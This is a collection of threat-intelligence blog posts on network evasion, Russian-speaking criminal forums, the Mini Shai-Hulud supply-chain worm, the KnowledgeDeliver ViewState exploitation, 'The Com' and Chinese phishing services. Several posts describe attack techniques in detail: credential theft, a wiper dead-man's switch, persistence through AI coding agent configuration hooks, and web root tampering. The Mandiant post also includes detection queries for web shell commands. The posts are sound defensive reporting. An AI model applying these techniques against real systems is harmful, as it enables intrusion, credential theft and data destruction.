  • Proactive protection against attacker infrastructure: While high-quality threat feeds remain essential for SOC investigations and incident response, relying on them for frontline, real-time prevention creates major blind spots. Instead, security teams must use real-world, global telemetry to proactively identify and block connections to attacker-controlled hosts before requesting a URL or file.
  • Zero trust principles applied to the network layer: An IP address without a negative reputation does not equal a safe connection. Continuous verification requires extending zero trust down to the network foundation. It validates the real-time behavior and intent of every single session to ensure attackers cannot hide in the contextual vacuum of the IP layer.Β Β 
  • Reducing the attack surface with rich contextual attributes: Traditional IP blocking is like a blunt instrument that creates unacceptable false positives and alert fatigue. To modernize the edge, security teams need deep, attribute-based visibility across the entire Internet address space to reduce noise and replace legacy IP feeds entirely.Β Β 

By moving away from point-in-time assumptions and embracing real-time, inline protection, security leaders can reclaim the advantage at the network foundation.

To see how these evasion tactics operate in the wild, read the latest Unit 42 report, Attackers Are Evading Threat Prevention at the Internet Edge. You’ll find this report valuable in understanding the systemic gaps in legacy risk models and learning why continuous verification must be our new mandate.

The post How AI and Evasion Demand a Radical Shift in Network Threat Prevention appeared first on Palo Alto Networks Blog.

Understanding Illicit Ecosystems: XSS and the Current State of the Russian-Speaking Underground

Blogs

Blog

Understanding Illicit Ecosystems: XSS and the Current State of the Russian-Speaking Underground

In this post, we explore XSS’ shift from a unified forum to a scattered community spread across several competing factions.

SHARE THIS:

What is XSS?

For more than two decades, XSS was the gathering ground for the Russian-speaking cybercriminal underground. Evolving from its former name, DaMaGeLaB, XSS evolved from a mid-tier message board into a top-tier hacking forum.

XSS is home to vendors of various crime types, including loaders, phishing, scamming, carding, malware development, distributed denial-of-service (DDoS) bots, and related services. It also facilitates the trade of illicit goods and services, while simultaneously serving as a networking and recruitment hub for threat actors.

XSS forum content falls within the following main sections:

  • β€œUnderground”: Includes most noncommercial content, such as sharing information on malware, vulnerabilities, and exploits, phishing, fraud, open source intelligence, artificial intelligence, and machine learning.
  • β€œProgramming, Development”: Includes posts and articles about programming languages and administration.
  • β€œLibrary”: Includes news articles, databases, and discussions around software and tools. Users also post about vulnerabilities and exploits.
  • β€œBusiness Decisions”: Users discuss different investments, the sale of digital goods, trading, start-ups of fraudulent businesses, and news about cryptocurrencies.
  • β€œLounge Zone, Resting”: Content involves lifestyle discussions, hobbies, and cybercriminal community rumors and scandals.
  • β€œTrading Platform”: Users sell and look to buy network access, malware, counterfeit documents, and advertise their services. This is where users hire and look for work or partners.
  • β€œPeople’s Court”: Used for complaints and arbitration and contains lists of phishing forums and scammers.
  • β€œOurs”: Contains information about the XSS project, discussions on issues, suggestions, and initiatives for forum improvement.
  • β€œPrivate: Underground”: Closed section for only forum members.
XSS forum main sections (Source: XSS)

XSS Disruption: July 2025 Takedown

On July 23, 2025, law enforcement organizations reportedly seized XSS as part of a multinational operation with Ukrainian authorities, French police, and Europol. Alongside the domain seizure, French authorities reported the arrest of XSS’s longtime administrator in Ukraine.

This arrest triggered an immediate chain reaction that has had lasting effects on the Russian-speaking undergroundβ€”with the XSS ecosystem splintering into several competing factions.

The Current State of the Russian-Speaking Underground

While the original XSS architecture was severely disrupted, the surrounding Russian-speaking cybercriminal ecosystem remains intensely active. However, instead of a centralized hub, the XSS ecosystem is spread out through competing environments that emerged directly from the fallout of the takedown.

DamageLib

Launched by the legacy moderators of XSS, DamageLib represents a structural pivot away from standard illicit forums. Concluding that the old XSS site was compromised by law enforcement, the moderators launched a new model that completely abandons commerceβ€”shutting down all buying, selling, and auctions entirelyβ€”-to eliminate user tracking and surveillance. Instead, it focuses strictly on technical materials and tutorials.

Rehub

Recognizing that displaced cybercriminals still required a commercial venue to trade, a former XSS moderator launched Rehub quickly after the emergence of DamageLib. Rehub immediately integrated a commercial platform, successfully recruiting prominent threat actors into its moderation team to establish underground credibility.

The forum is still in its development stage, with its content being populated, and an active member base being built.

XSS[.pro]

In early August 2025, an unknown entity launched an alleged resurrection of the forum on a new domain [.pro], utilizing old backups that preserved legacy user data, threads, and forum deposits. However, this new version has been met with significant distrust from Exploit and DamageLib, believing the [.pro] domain to be a honeypot controlled by law enforcement.

XSSF Forum

Started by a pro-Russian Telegram hacking group, this community actively targets EU and Ukrainian digital infrastructure. According to user discussions on DamageLib, this forum is not related to XSS. In addition, Flashpoint analysts note that targeting Ukrainian infrastructure directly contradicts its original community rules. The authenticity of this forum and its ownership has not been verified.

Monitor a Fractured Underground Using Flashpoint

While law enforcement achieved a significant victory over XSS, they did not eliminate the Russian-speaking cybercriminal underground. Instead, they broke the foundational trust mechanics that had kept it centralized for twenty years.

This has left the Russian-speaking underground in a deeply fractured state that is still intensely active and highly adaptive. For defenders and analysts, this threat has not diminishedβ€”it has diversified. Tracking this ecosystem no longer means watching a single centralized community, but rather actively mapping out the live migrations, shifting rules, and behavioral patterns across these splintered groups.

Request a demo to learn how Flashpoint helps security teams aggregate intelligence from these scattered factions into a single source of truth, empowering your organization to proactively monitor and intercept emerging threats.

Request a demo today.

The post Understanding Illicit Ecosystems: XSS and the Current State of the Russian-Speaking Underground appeared first on Flashpoint.

The Mini Shai-Hulud Worm and the New Era of CI/CD Exploitation

Blogs

Blog

The Mini Shai-Hulud Worm and the New Era of CI/CD Exploitation

In this post we break down the technical mechanics of TeamPCP’s recent campaign, the impact on the developer ecosystem, and the urgent steps needed to secure software supply chains.

SHARE THIS:
Default Author Image
May 28, 2026

The developer ecosystem recently faced one of its most significant architectural threats to date, with the threat actor group TeamPCP unleashing Mini Shai-Huludβ€”a self propagating worm and multi-ecosystem threat. Potentially affecting millions of developers and thousands of companies, Mini Shai-Hulud has fundamentally compromised the trust layer of modern CI/CD pipelines.

The operational tempo of Mini Shai-Hulud has accelerated with every campaign. What began as opportunistic credential theft has now evolved into a high-speed, automated operation that can compromise hundreds of packages in under thirty minutes. From the exfiltration of approximately 3,800 internal GitHub repositories to the poisoning of critical libraries like TanStack and AntV, TeamPCP’s campaign has been incredibly effective in exploiting developer tooling and identity infrastructure.

What is Mini Shai-Hulud?

Mini Shai-Hulud is deployed as a 498 KB obfuscated script executed using the Bun JavaScript runtime. The deliberate choice of Bun, rather than Node.js, is a tactical evasion technique as most endpoint detection and response (EDR) platforms and security information and event management (SIEM) solutions have behavioral rules tuned to Node.js execution patterns.

How Mini Shai-Hulud Works

The worm propagates by stealing npm and GitHub authentication (OIDC) tokens from developer environments, then using those credentials to publish malicious versions of packages the compromised user maintains. To accomplish this, the worm scrapes runner process memory to extract short-lived identity tokens, which it then exchanges for per-package npm trusted-publisher tokens without requiring any long-lived npm secrets.

Credential Exfiltration and Command-and-Control

Mini Shai-Hulud targets credentials across 130 file paths, including npm tokens, GitHub personal access tokens, AWS, GCP, and Azure configuration files, Kubernetes kubeconfig files, Docker credentials, HashiCorp Vault tokens, 1Password and Bitwarden CLI vaults, SSH private keys, and Bitcoin wallet files.Β 

Exfiltration occurs across multiple channels: the Session Protocol network, the GitHub Git Data API using dynamically created Dune-themed repositories on victim accounts, HTTPS to the threat actor-controlled domain, and an api for GitHub Actions workflow exfiltration.

The worm uses a dead-drop command-and-control (C2) architecture via GitHub’s public commit search API. An installed daemon (kitty-monitor, deployed as a systemd service on Linux or a LaunchAgent on macOS) polls GitHub for commits containing the string β€œfiredalazer,” parses RSA-PSS-signed command payloads from matching commits, and executes them. This technique leverages GitHub as a trusted relay, making C2 traffic difficult to block without disrupting legitimate GitHub usage.

The worm then uses a persistence mechanism as a dead-man’s switch: a GitHub personal access token named β€œIfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner” is created on compromised developer machines. If an operator revokes this token without first disabling the persistence mechanism, the worm destroys all home directory data on the compromised device.

AI Agent Hijacking

Beyond standard persistence mechanisms, Mini Shai-Hulud targets AI coding agents. The SafeDep analysis documents that the worm modifies Claude Code’s settings .json to insert a SessionStart hook, enabling the worm to be reinstated with full LLM API privileges even if the infected npm packages are later removed, or the npm cache is cleared. A similar technique targets Visual Studio Code’s tasks.json file using the β€œrunOn”: β€œfolderOpen” trigger, and Codex configuration files are also targeted.

These AI agent hijacking techniques represent a novel attack surface: by persisting within trusted AI tool configurations, the malware can exfiltrate all code and secrets processed by those tools during future development sessions.

Four Waves of Supply Chain Attacks

Flashpoint has observed at least four documented waves of TeamPCP npm and PyPI supply chain attacks in 2026, leveraging Mini Shai-Hulud to compromise developer tooling ecosystems and steal credentials, cloud keys, and source code across tens of thousands of organizations.Β 

The following timeline tracks the escalation of TeamPCP and the Mini Shai-Hulud waves throughout 2026:

Wave 1: Initial SAP Packages (April 2026)

The first documented wave of Mini Shai-Hulud attacks targeted a small number of SAP-ecosystem npm packages in April 2026. While TeamPCP had already proven their CI/CD attack capabilities in March 2026 by compromising Aqua Security’s Trivy scanner and Checkmarx KICS via GitHub Actions, this initial wave served primarily as a proof-of-concept for the self-propagation mechanism and a reconnaissance phase for TeamPCP’s access broker network. Further, these attacks demonstrated the group’s ability to compromise widely used security toolingβ€”a development that significantly undermines defenders’ ability to trust automated CI/CD pipeline scanning results.

Wave 2: TanStack, Mistral AI, and Guardrails AI (May 2026)

Leveraging a GitHub Actions cache-poisoning technique, TeamPCP published malicious versions of 42 TanStack packages across 84 releases, impacting a project with over 518 million cumulative downloads.Β 

The attack also compromised Mistral AI and Guardrails AI, extending the attack surface to the AI developer tools ecosystem. Forged commit authorship was used to blend the attacker’s commits into AI-assisted development environments where Claude Code is commonly deployed.

TeamPCP simultaneously listed Mistral AI source code for sale on BreachForums, claiming possession of approximately 5 GB of data across 450 internal Mistral repositories.

TeamPCP BreachForums posts advertising Mistral AI internal source code and repositories for sale, May 2026. (Source: Flashpoint)

Wave 3: AntV Ecosystem (May 2026)

Targeting AntV enterprise data visualization ecosystem, TeamPCP compromised the atool npm account, which held publishing rights across a broad catalog of AntV packages. In 22 minutes, 637 malicious versions were published across 323 packagesβ€”a scale and speed that overwhelmed standard security monitoring pipelines.

Each infected package contained the Mini Shai-Hulud worm, which, upon execution, created up to 2,500 compromised repositories on victim accounts within hours.

Wave 4: Co-Ownership of BreachForums and GitHub Breach

In the most recent wave, TeamPCP announced its assumption of co-ownership of BreachForums, the largest English-language cybercriminal forum currently active. This development significantly elevates TeamPCP’s standing and operational reach. As co-owners, the group stated it would manage platform operations, handle dispute resolution, staff and vet moderation personnel, and host monetary contests for the community. The announcement positions TeamPCP as both an active threat actor and a platform-level infrastructure operator, with the ability to shape forum policies, curate the availability of criminal tooling, and influence the broader access broker and ransomware ecosystem.

Additionally, by poisoning a GitHub employee’s development environment, TeamPCP exfiltrated approximately 3,800 internal GitHub repositories. Within the stolen data were highly sensitive codebases such as:

  • copilot-api and copilot-token-service
  • actions-runtime
  • billing-platform
  • enterprise-crypto
  • authentication
  • codeql-core
  • detection-engineering
  • csirt
  • azure-config
TeamPCP BreachForums posts advertising GitHub internal source code for sale. (Source: Flashpoint)

Recommended Immediate Actions

Critically, the theft of internal source code from one of the world’s most widely used code hosting platforms creates incredible downstream risk for organizations that depend on GitHub Copilot and GitHub Actions for their own software development pipelines. Organizations running AI coding agents such as Claude Code and VS Code with extensions in their CI/CD pipelines face heightened exposure. Security teams should treat AI agent configuration files as sensitive assets subject to integrity monitoring and change-control policies.

If your organization uses npm, PyPi, or AI-assisted development tools, Flashpoint recommends the following immediate steps:

  1. Audit and remove: Immediately audit CI/CD environments and remove all infected versions of AntV, TanStack, Mistral AI, and Bitwarden CLI packages.
  2. Rotate credentials: Rotate all cloud credentials (AWS, GCP, Azure) and npm tokens.
  3. Disable persistence first: Before revoking suspicious GitHub tokens, ensure the kitty-monitor daemon is disabled to avoid triggering the β€œdead-man’s switch” wiper.
  4. Lock down IDEs: Restrict the installation of VS Code extensions to an approved allow-list and monitor for unauthorized changes to settings.json or tasks.json.
  5. Block C2 infrastructure: Block all traffic to identified TeamPCP C2 domains.

Track TeamPCP and Defend against Mini Shai-Hulud Using Flashpoint

Flashpoint assesses with high confidence that TeamPCP will continue to scale its supply-chain attacks against npm, PyPI, and developer tooling ecosystems. The group’s shift from direct execution to orchestrating a broader ecosystem via BreachForums signals a maturation into a platform-layer criminal operation. While TeamPCP has hinted that the group may be approaching β€œretirement” due to law enforcement pressure, this should be treated with caution. Whether a misdirection or a genuine exit plan, the open-sourcing of Shai-Hulud means the tradecraft is available to the wider cybercriminal community.

Organizations should reference the OpenSSF npm Best Practices guidance for a practical baseline in hardening their package consumption posture. Flashpoint customers can gain access to known Indicators of Compromise (IOCs) and MITRE ATT&CK Mapping for Mini Shai-Hulud by logging into Flashpoint Ignite. To learn more about how Flashpoint tracks threat actor groups like TeamPCP and protects the software supply chain, request a demo.

Request a demo today.

The post The Mini Shai-Hulud Worm and the New Era of CI/CD Exploitation appeared first on Flashpoint.

Understanding Illicit Ecosystems: The Hybrid Threat of β€œThe Com”

Blogs

Blog

Understanding Illicit Ecosystems: The Hybrid Threat of β€œThe Com”

In this post, we dive into the decentralized architecture of β€œThe Com,” exposing its hybrid ecosystem of hacking, extortion, and real-life violenceβ€”and how it fuels a ruthless pipeline of cyber-fraud cycles and adolescent exploitation.

SHARE THIS:
Default Author Image
May 26, 2026

What is β€œThe Com”?

The Community, more widely known as β€œThe Com” is a sophisticated hybrid threat ecosystem in which cybercrime serves as the venture capital for domestic terrorism. Existing since the early 2010s, it operates in the β€œedgesphere”, a grey area where mainstream social media overlaps with underground criminal networks, blending nihilistic violent extremism (NVE) with high-level financial fraud. In The Com, cybercrime against Fortune 500 companies is the primary revenue stream used by members to fund a domestic terror network that aims to radicalize youth and encourage real-world violence.

However, The Com poses more than just financial risk, it is a self-serving victim-to-perpetrator pipeline. It uses stolen capital to recruit adolescents, who they view as a disposable workforce, turning them from a victim to a perpetrator. Despite being a decentralized web of individuals rather than a traditional threat actor organization, The Com has managed to grow by hiding in the gaps between corporate security, parental oversight, and law enforcement.

How The Com is Structured

The Com is often mischaracterized as a single, formal organization. In reality, its ecosystem is unstructured and lacks a shared culture or leadership. However, the various factions within the ecosystem are extremely organized, supporting three broad categories of criminal activity: cybercrime, exploitation of minors, and real-world physical violence.

Federal investigations have shown that The Com includes a mix of adults and minors, men and women. While the exact number of members is difficult to determine, Flashpoint estimates that the broader ecosystem of The Com is in the thousands. While being a global threat, its most active core members are concentrated in Western English-speaking countries: the United Kingdom, the United States, and Canada.

Understanding the Key Pillars of The Com

While The Com is a decentralized ecosystem, its internal structure is defined by a high degree of operational alignment. Individual crews and networks within each pillar exhibit a shared psychology and standardized tradecraft that ensures their criminal activities remain effective and repeatable.

However, Flashpoint notes that members of these pillars do not operate alone. Their interaction with members of other pillars (extortion and real-world violence) amplifies the intended threat.

HACKER Com: The Economic Engine of The Com

Hacker Com acts as the ecosystem’s economic engine and primary technical arm. Its primary function is to hack major corporations and commit financial fraud to fund the broader community’s activities and lifestyle.
Seeing themselves as the elite technical tier of The Com, Hacker Com members are motivated primarily by financial gain and the thrill of outsmarting corporate security infrastructures. Notable crews within this pillar include Scattered Spider, LAPSUS$, ShinyHunters, and DragonForce.

TTPs Used by HACKER Com

The following tactics, tools, and procedures (TTPs) have been observed by HACKER COM groups:

Social Engineering (Vishing)

Hacker Com members capitalize on TTPs that target human vulnerabilities instead of relying solely on software and other exploits. Vishing is a signature move of the Scattered Spider crew, whose native English-speaking members call corporate IT helpdesks impersonating employees of that company.Β 

Analysts note these threat actors are likely Gen Z who socially engineer older support staff by mimicking the impatient attitudes and vernacular of young tech executives, essentially hacking the generation gap. They leverage this form of social engineering to convince support staff to reset passwords or even re-enroll new multifactor authentication (MFA) devices, which grants them access to the victims’ networks.

Supply Chain Targeting

Crews in this pillar have also successfully breached major targets by attacking their trusted vendors. For instance, Lapsus$ compromised Okta by targeting its third-party contractor, Sykes, while Scattered Spider has repeatedly targeted Okta’s identity services to pivot into their clients’ networks.

Living-off-the-land (LOTL)

Once inside a network, threat actors avoid detection by using legitimate, preexisting software and other remote admin tools such as AnyDesk, Ngrok, and Teleport to maintain persistence and move laterally. They often gamify this access, mocking victims for allowing them to simply β€œlog in” using standard admin tools rather than having to hack their way in via complex exploits. They treat the ease of access as a testament to the victim’s incompetence.

SIM Swapping

A SIM swap attack is a foundational TTP used by financially motivated actors that involves social engineering mobile carriers to hijack a target’s phone number, usually resulting in the takeover of high-value cryptocurrency accounts.

EXTORT Com: The Ideological Engine of The Com

The Extort Com pillar functions as a machine designed for psychological control, coercion, and sexual exploitation of minors. Its goals intersect squarely with NVE ideologies, resulting in a marketplace and production center for CSAM and extreme violence, where members often trade these materials as a form of social currency.

Targets are migrated from public channels, which include social media and video games such as Roblox and Minecraft, to private ones maintained by The Com. Once moved, the dynamic shifts from recruitment to active exploitation, which is done to ensure the victim’s compliance.

IRL Com: The Enforcement Engine of The COM

The β€œIn Real Life” (IRL) pillar serves as the physical enforcement arm of the ecosystem, effectively bridging the gap between virtual threats and reality. Sometimes referred to by law enforcement as β€œIRL Terror,” members often turn online animosity and disputes into real-world harm against people and their property.

Protect Against Converging Threats Using Flashpoint

The evolution of The Com represents a fundamental shift in the global threat landscape. It is not enough to view cybercrime as a purely financial risk or domestic extremism as a purely ideological one, the two have merged into a self-sustaining engine where stolen corporate capital fuels the radicalization and exploitation of the next generation.

As The Com continues to professionalize its tradecraft and expand its reach, the boundary between our digital and physical worlds will only continue to thin. To protect against this decentralized threat, organizations will require a mutli-layered defense strategy that is powered by intelligence that is sourced at the heart of these groups. Request a demo to learn more.

Request a demo today.

The post Understanding Illicit Ecosystems: The Hybrid Threat of β€œThe Com” appeared first on Flashpoint.

Exploitation of KnowledgeDeliver via ViewState Deserialization Vulnerability

25 May 2026 at 16:00

Written by: Takahiro Sugiyama, Peter Revelant, Mathew Potaczek


Introduction

In late 2025, Mandiant responded to a security incident involving a compromised web server running KnowledgeDeliver. KnowledgeDeliver is a Learning Management System (LMS) developed by Digital Knowledge commonly used in Japan. Mandiant identified a critical vulnerability that allowed unauthenticated Remote Code Execution (RCE). An unknown threat actor leveraged this access to inject malicious code into the LMS platform, with the goal of infecting users visiting the site.

This vulnerability stems from the use of identical pre-shared ASP.NET machine keys across multiple customer deployments. The vulnerability was initially exploited as a zero-day, now tracked as CVE-2026-5426.

The Vulnerability

KnowledgeDeliver installations deployed before Feb. 24, 2026 relied on a standardized web.config file provided by the vendor. This configuration file contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign data, including ViewState payloads.

Because these keys were identical across independent customer environments, a threat actor who obtained the keys from one deployment could compromise any other internet-facing KnowledgeDeliver instance.

The following is an example of the relevant configuration line found in the web.config file:

<machineKey decryptionKey="<REDACTED>" validationKey="<REDACTED>" />

The ASP.NET ViewState persists page state across postbacks. When the machineKey is known, a threat actor can craft a malicious ViewState payload. By sending this payload in an HTTP request (via the __VIEWSTATE parameter), the threat actor can make the server deserialize it.

This technique follows the pattern of the ViewState Deserialization Zero-Day Vulnerability affecting Sitecore (previously reported by Mandiant), and Code injection attacks using publicly disclosed ASP.NET machine keys reported by Microsoft. This highlights how it is critical to keep the machine key unique and secure.

Post-Exploitation Activity

Once access was established, the threat actors focused on maintaining their presence and expanding the impact of the compromise.

BLUEBEAM Web Shell Deployment

The threat actor deployed a .NET-based in-memory web shell called BLUEBEAM (also known as Godzilla). The use of BLUEBEAM is consistent with the Microsoft reporting. This malware operates entirely in memory within the IIS worker process (w3wp.exe), making it difficult to detect through traditional file-based scanning. It allows threat actors to execute further commands and payloads by sending encrypted data via HTTP POST request bodies.

File Tampering

The threat actor was observed executing commands to escalate their control over the web server's file system:

  1. Permission Modification: The threat actor used icacls to grant "Everyone" full access to the web application directory.

  2. JavaScript Tampering: The threat actor modified an application JavaScript file, adding code to perform the following:

  • Display a fake security alert, prompting users to install a "security authentication plugin".

  • Silently load a remote malicious script hosted on a threat actor-controlled domain.

Cobalt Strike Infection

The remote script convinced users to download a fake installer, which led to workstations being infected with a Cobalt Strike BEACON backdoor. The payload was encrypted using a key that used the name of the compromised organization, which indicated that the threat actor prepared this payload specifically for the targeted organization.

How to Hunt for This Activity

Organizations should monitor for the following indicators to identify potential ViewState exploitation and post-exploitation activity.

1. Application Event Logs (Event ID 1316)

Monitor the Windows Application log for Event ID 1316 from the source ASP.NET 4.0.30319.0 (or similar).

  • Failed Attempt (Integrity Failure): Event code: 4009-++-Viewstate verification failed. Reason: The viewstate supplied failed integrity check. May indicate an attack attempt with an incorrect key.

  • Successful Execution (Invalid ViewState): Event code: 4009-++-Viewstate verification failed. Reason: Viewstate was invalid. Confirms integrity checks were passed. Deserialization of the payload was attempted and may have succeeded. The payload may or may not have been executed.Β 

Mandiant decrypted payload strings recorded in the event log messages with the server’s machine keys and recovered a payload related to a BLUEBEAM web shell.

2. Suspicious Process Activity

Monitor for unusual child processes spawned by w3wp.exe. Commands observed include:

  • cmd.exe /c ...

  • whoami

  • powershell.exe

3. File Integrity Monitoring

Monitor for unauthorized changes to .js, .aspx, or .config files within the web root. Specifically, look for the addition of remote script loaders or unusual logic in commonly used libraries.

4. Anomalous User-Agent Strings

Mandiant identified User-Agent strings consisting of two distinct identifiers concatenated together, which were consistent with ones reported in ViewState Deserialization Zero-Day vulnerability. Monitor for web request logs for such anomalous User-Agent strings. The following are examples of identified User-Agent strings:

  • Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.2 (KHTML, like Gecko) Chrome/22.0.1216.0 Safari/537.2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

  • Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

  • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Remediation and Mitigation

  • Rotate Machine Keys: Immediately generate a unique, cryptographically strong machine key for each KnowledgeDeliver instance. This is the only way to invalidate the shared secret.

  • Restrict Access: If possible, limit access to the LMS to known organizational IP address ranges.

  • Investigation: Hunt for this activity, and conduct a thorough investigation if any signs of exploitation are identified.

Outlook and Implications

The exploitation of KnowledgeDeliver highlights the severe risks of using shared secrets in deployment templates. A single leaked key can compromise an entire ecosystem of installations. By implementing unique secrets and robust endpoint monitoring, organizations can defend against these deserialization attacks.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a free GTI Collection for registered users.

File Name

Type

SHA-256

LoadLibrary.dll

BLUEBEAM

7c1f99dca8e5a7897892f9d224a6495023a2cfd2671697d229d355978c415ed2

Google Security Operations (SecOps)Β 

The following SecOps searches can be used to hunt for this activity.

(metadata.log_type = "WINEVTLOG" or metadata.log_type = "WINEVTLOG_XML") 
metadata.product_event_type = "1316"
additional.fields["Message"] = /Event code: 4009\b/ nocase
(metadata.event_type = "PROCESS_LAUNCH" or metadata.event_type = "PROCESS_OPEN") AND
principal.process.command_line = /w3wp.exe/ nocase AND
target.process.command_line = /cmd.+ \/c |whoami|powershell/ nocase

SecOps customers have access to the following rules and more under the Mandiant Hunting Rules, Mandiant Frontline Threats, Mandiant Intel Emerging Threats rule packs:

  • ASP.NET ViewState Deserialization Attempt

  • W3wp Launching Cmd With Recon Commands

  • W3wp Launching Encoded Powershell

  • W3wp Launching Icacls

  • Web Server Process Launching Whoami

  • IIS ViewState Exploitation Success

  • IIS ViewState Exploitation Followed by Web Root File Tampering

  • Possible Windows Exchange Server Spawning Shell

Acknowledgements

Mandiant would like to extend our thanks to the Digital Knowledge team for their collaboration regarding this disclosure.

2 PhaaS 2 Furious: The Evolution of Chinese-Language Phishing Services

25 May 2026 at 16:00

While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground. Google Threat Intelligence Group (GTIG) analyzed a dozen current PhaaS offerings in the Chinese underground, all of them mature services and many likely tied intricately to the broader criminal ecosystem in that region. These services not only lower the barrier to entry for Chinese cyber criminals, but reveal broader patterns on the evolution of social engineering and credential theft. Late last year, Google took legal action against one PhaaS provider and has worked since then to endorse legislation and enact technical safeguards against these types of scams.

Within this ecosystem, GTIG has observed a fundamental move away from static password harvesting towards real-time interception and tokenization. By utilizing live administration panels, attackers can interact with victims in real-time to capture one-time passcodes (OTPs), allowing them to bypass multifactor authentication (MFA) instantly.

Instead of simply gaining account access, these operations focus on exploiting digital wallet provisioning to transform stolen payment data into tokenized assets within ecosystems. This shiftβ€”combined with the use of encrypted delivery channels like RCS and iMessage to bypass traditional carrier security filters on SMS messagesβ€”represents an emerging development where the goal is no longer just a login, but securing direct, unauthorized control over a victim's financial accounts.

Example phishing site chain

Figure 1: Example phishing site chain

The Chinese-Language PhaaS EcosystemΒ 

The Chinese-language PhaaS ecosystem is not merely a regional mirror of Russian operations – it is a distinct market shaped by a unique professional culture. Nearly all the legitimate organizations mimicked by these phishing services are non-Chinese entities, suggesting they rarely target China.

  • Public impact: Unlike the major Russia-based PhaaS offerings that are typically used to target customers of large organizations, phishing services advertised in Chinese-language communities are often designed to target the general public more opportunistically.

  • Open Operations: In contrast to their Russian-speaking counterparts, providers of Chinese-language phishing services often operate openly with less regard for operational security. For instance, the threat actors running these services regularly post photos of their luxury lifestyles on Telegram.

  • Focus on Telegram: Advertisements for the phishing services are regularly posted to Telegram rather than channels such as WeChat (Weixin) or Tencent QQ, which are regionally more popular. This approach is consistent with the broader Chinese-language cyber crime ecosystem.

  • Extensive offering: While PhaaS is at the core of these operations, these developers also typically offer numerous ancillary services, forming a complete, mature, and extensive offering. These include the sale of personally identifiable information (PII), domain name registration and virtual private server (VPS) hosting services, server rentals, money laundering services, eavesdropping devices (International Mobile Subscriber Identity [IMSI] catchers), and message sending services (spamming assistance). Some platform vendors are also involved in trading stolen payment card information.Β 

Notable Chinese-Language PhaaS TTPs

  1. Delivery via RCS and iMessage: These attacks begin by exploiting trust in modern communication. Rather than traditional SMS, these Chinese-language PhaaS operators heavily leverage Rich Communication Services (RCS) and Apple’s iMessage. Protocols that use end-to-end encryption make it difficult for server-side delivery infrastructure to inspect or filter malicious links, which makes on-device protections critical. Messages also contain more extensive engagement features (including read receipts, typing indicators, group chat functionalities, as well as the ability to send high-resolution images, videos, and larger files). This makes them ideal for social engineering operations, as lures appear remarkably legitimate to the average user.Β 
  2. Real-time Interception: When a victim clicks a malicious link and enters their credentials, the data is displayed instantly on an administrative panel. This allows an adversary to interact with the victim in real-time. As the victim is prompted for an OTP, an attacker simultaneously triggers that same OTP request on their own device. The victim enters the code into the phishing page, and the attacker captures it seconds before it expires.
  3. Leveraging Digital Wallets for Monetization: A defining characteristic of these operations is their exploitation of digital wallet provisioning to monetize stolen payment details. Attackers use captured credentials and OTPs to provision the victim’s card into a digital wallet on an attacker-controlled device. Once tokenized, the card can be used for high-value transactions, contactless payments, and ATM withdrawals. While payment card data theft is the focus, this ecosystem also develops brokerage-focused templates, which can be used to facilitate traditional account takeovers (ATO) for wire fraud and stock manipulation.
  4. AI-Based Automation: Multiple Chinese-language PhaaS operators have adopted AI for their operations to enable scale and stealth. As one example, the Darcula PhaaS platform, which we link to UNC5814, has moved away from static templates, instead utilizing AI-powered page generators and browser automation tools like Puppeteer. This enables users to clone legitimate websites by replicating their HTML, CSS, JavaScript, and visual elements through providing the target website's URL. As each phishing page is unique as opposed to relying on static templates, signature-based detection methods are rendered increasingly ineffective.Β 

Localization-as-a-Service

The Chinese-speaking PhaaS ecosystem has shifted towards a highly automated model capable of generating localized content for diverse international markets. Unlike traditional phishing kits that have historically relied on static and poorly translated templates, these operators provide the infrastructure for cultural fluency at scale. By offering everything from AI-powered page generators to region-specific delivery assistance, they enable low-skilled affiliates to launch high-fidelity campaigns.Β 

YY Lai Yu (YYζ₯ι±Ό): A Case Study in Localization

YY Lai Yu (YYζ₯ι±Ό), first advertised in August 2024, is one example of a PhaaS offering that provides a local digital ecosystem. While the platform supports phishing across 119 countries, its largest focus has been on Japan. Managed by a core team including "YY Lai Yu," "Jeffrey Carrie," and "Very casual," the service provides Chinese-speaking threat actors with the localized infrastructure necessary to effectively target the Japanese consumer ecosystem.

A graph of countries targeted by YY Lai Yu (YYζ₯ι±Ό) phishing

Figure 2: A graph of countries targeted by YY Lai Yu (YYζ₯ι±Ό) phishing

A YY Lai Yu (YYζ₯ι±Ό) phishing page targeting a Japanese user’s Apple account

Figure 3: A YY Lai Yu (YYζ₯ι±Ό) phishing page targeting a Japanese user’s Apple account

A YY Lai Yu (YYζ₯ι±Ό) phishing page targeting a Japanese user’s PayPay account, the largest Japanese mobile payment app

Figure 4: A YY Lai Yu (YYζ₯ι±Ό) phishing page targeting a Japanese user’s PayPay account, the largest Japanese mobile payment app

Since November 2025, YY Lai Yu has offered more than 400 phishing templates to its customers, moving beyond generic banking lures to also target the digital lifestyle of Japanese residents. These templates included various Japanese language and Japanese brands, including for Amazon, Apple, DMM, Epos Card, JA Bank, JCB Card, JR (Rail), Matsui Securities, Mercari, Monex, Nintendo, Nomura Securities, Orico Card, PayPay, Rakuten Securities, and Sagawa Express. However, instead of merely providing fake account pages, the threat actors tapped heavily into local consumer habits by developing "points" (η§―εˆ†) and rewards redemption lures, pressuring victims to redeem supposedly expiring loyalty points for cash or goods. Demonstrating a deep awareness of the local economic climate, the operators also exploited cost-of-living concerns by crafting lures around the Japan Winter Electricity Subsidy.Β 

